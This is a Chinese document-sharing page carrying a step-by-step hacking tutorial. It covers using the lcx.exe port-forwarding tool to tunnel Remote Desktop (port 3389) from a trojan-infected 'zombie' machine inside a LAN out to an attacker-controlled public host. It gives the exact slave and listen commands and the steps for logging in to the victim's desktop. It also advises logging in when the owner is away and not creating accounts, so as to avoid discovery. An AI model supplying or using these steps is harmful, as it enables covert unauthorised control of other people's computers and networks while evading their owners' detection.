資源描述:
《LCX轉(zhuǎn)發(fā)內(nèi)網(wǎng)端口》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在教育資源-天天文庫(kù)。
1、在理論上只要網(wǎng)絡(luò)連接的計(jì)算機(jī)都是可以訪問(wèn)的,但是在實(shí)際中往往由于技術(shù)水平等原因,很難實(shí)現(xiàn)它;例如局域網(wǎng)中的某臺(tái)計(jì)算機(jī)僅僅開(kāi)放了Web服務(wù),該服務(wù)僅能供內(nèi)網(wǎng)用戶(hù)使用,而外網(wǎng)用戶(hù)根本沒(méi)有辦法直接訪問(wèn)。因此要想讓外網(wǎng)用戶(hù)能夠訪問(wèn)局域網(wǎng)中的系統(tǒng)服務(wù),這必須進(jìn)行端口映射等操作才行。端口映射在入侵內(nèi)網(wǎng)的時(shí)候經(jīng)常用到,特別是要登陸遠(yuǎn)程終端服務(wù)時(shí),使用端口映射就非常方便?! cx.exe是一個(gè)端口轉(zhuǎn)發(fā)工具,相當(dāng)于把肉雞A上的3389端口轉(zhuǎn)發(fā)到具有外網(wǎng)IP地址的B機(jī)上,這樣連接B機(jī)的3389端口就相當(dāng)于鏈接A機(jī)的3389端口。Lcx程序多用于被控制計(jì)算機(jī)(
2、肉雞)處于內(nèi)網(wǎng)的情況,被控制機(jī)可能中了木馬程序,雖然能夠進(jìn)行控制,但還是沒(méi)有使用遠(yuǎn)程終端登陸到本機(jī)進(jìn)行管理方便,因此在很多情況下,都會(huì)想方設(shè)法在被控制計(jì)算機(jī)上開(kāi)啟3389端口,然后通過(guò)lcx等程序進(jìn)行端口轉(zhuǎn)發(fā),進(jìn)而在本地連接到被控制計(jì)算機(jī)的遠(yuǎn)程終端并進(jìn)行管理和使用。 1確定被控制計(jì)算機(jī)的IP地址 在被控制計(jì)算機(jī)上開(kāi)啟遠(yuǎn)程終端,然后執(zhí)行“ipconfig/all”命令,查看其網(wǎng)絡(luò)配置情況,如圖1所示,該計(jì)算機(jī)的ip地址為“192.168.80.129” 圖1確定被控制計(jì)算機(jī)的IP地址 2在被控制計(jì)算機(jī)上執(zhí)行端口轉(zhuǎn)發(fā)命令 在被控制
3、計(jì)算機(jī)上執(zhí)行“l(fā)cx–slave218.69.*.*51192.168.80.1293389”,如圖2所示,執(zhí)行完畢后會(huì)給出一些提示,如果顯示為“MakeaConnectionto218.69.*.*:51”則表示端口轉(zhuǎn)發(fā)正確?! D2在被控制計(jì)算機(jī)上執(zhí)行轉(zhuǎn)發(fā)命令 說(shuō)明 lcx一共有三條命令,第一條命令(lcx–lister513389)是在具有外網(wǎng)獨(dú)立IP的計(jì)算機(jī)上執(zhí)行,表示在本機(jī)上監(jiān)聽(tīng)51端口,該端口主要是接受被控制計(jì)算機(jī)3389端口轉(zhuǎn)發(fā)過(guò)來(lái)的數(shù)據(jù)。第二條命令(lcx–slave218.69.*.*51192.168.80.12
4、93389)表示將本機(jī)IP地址為192.168.80.129的3389端口轉(zhuǎn)發(fā)到遠(yuǎn)程地址為“218.69.*.*”的51端口。第三條命令是端口轉(zhuǎn)向?! ?在本機(jī)上執(zhí)行監(jiān)聽(tīng)命令 在本機(jī)上打開(kāi)DOS命令提示符,然后到lcx.exe程序所在路徑執(zhí)行“l(fā)cx–lister513389”命令,監(jiān)聽(tīng)51端口,監(jiān)聽(tīng)成功后,會(huì)顯示如圖3所示的數(shù)據(jù)?! D3在本機(jī)上監(jiān)聽(tīng)51端口 注意 (1)在本機(jī)上監(jiān)聽(tīng)的端口必須是未使用的端口,可以使用“netstat-an
5、find"51"”命令進(jìn)行查看,如果沒(méi)有顯示結(jié)果則表示51端口可以用來(lái)進(jìn)行監(jiān)聽(tīng)?! ?2)
6、被控制計(jì)算機(jī)與本機(jī)成功建立連接后會(huì)不停的顯示連接數(shù)據(jù),如圖4所示,如果未出現(xiàn)數(shù)據(jù)發(fā)送和接受的情況,說(shuō)明連接建立不成功。 圖4成功建立連接 4在本機(jī)使用遠(yuǎn)程終端進(jìn)行登錄 在DOS提示符下輸入“mstsc”命令打開(kāi)遠(yuǎn)程終端連接器,輸入“127.0.0.1”后單擊“連接”按鈕進(jìn)行遠(yuǎn)程終端連接,在出現(xiàn)登錄界面后分別收入用戶(hù)名和密碼,驗(yàn)證通過(guò)后,即可遠(yuǎn)程進(jìn)入被控制計(jì)算機(jī)的桌面,如圖5所示,輸入“ipconfig/all”以及“netuser”命令來(lái)查看網(wǎng)絡(luò)配置情況以及用戶(hù)信息?! D5遠(yuǎn)程登入被控制計(jì)算機(jī) 注意 (1)如果被控制計(jì)算
7、機(jī)是服務(wù)器,則在登陸時(shí)可以直接進(jìn)行登陸;如果被控制計(jì)算機(jī)是WindowsXP系統(tǒng),則最好選擇用戶(hù)不在計(jì)算機(jī)的時(shí)間進(jìn)行登陸,否則容易被發(fā)現(xiàn)?! ?2)不要輕易在被控制計(jì)算機(jī)上建立賬號(hào),尤其是WindowsXP,建立帳號(hào)后,會(huì)立即在登陸界面中進(jìn)行顯示。 5查看本地連接 在被控制計(jì)算機(jī)上使用“netstat-an”查看當(dāng)前所有的連接時(shí),可以看到被控制計(jì)算機(jī)時(shí)在跟自己進(jìn)行遠(yuǎn)程終端連接,如圖6所示,而實(shí)際的3389端口是跟本機(jī)的51端口進(jìn)行連接的?! D6查看實(shí)際網(wǎng)絡(luò)連接 本案例通過(guò)使用lcx端口轉(zhuǎn)發(fā)程序,成功的在本機(jī)連入被控制計(jì)算機(jī)的內(nèi)網(wǎng)
8、,可以很方便的對(duì)該計(jì)算機(jī)進(jìn)行遠(yuǎn)程管理,在進(jìn)行內(nèi)網(wǎng)滲透時(shí)尤為有用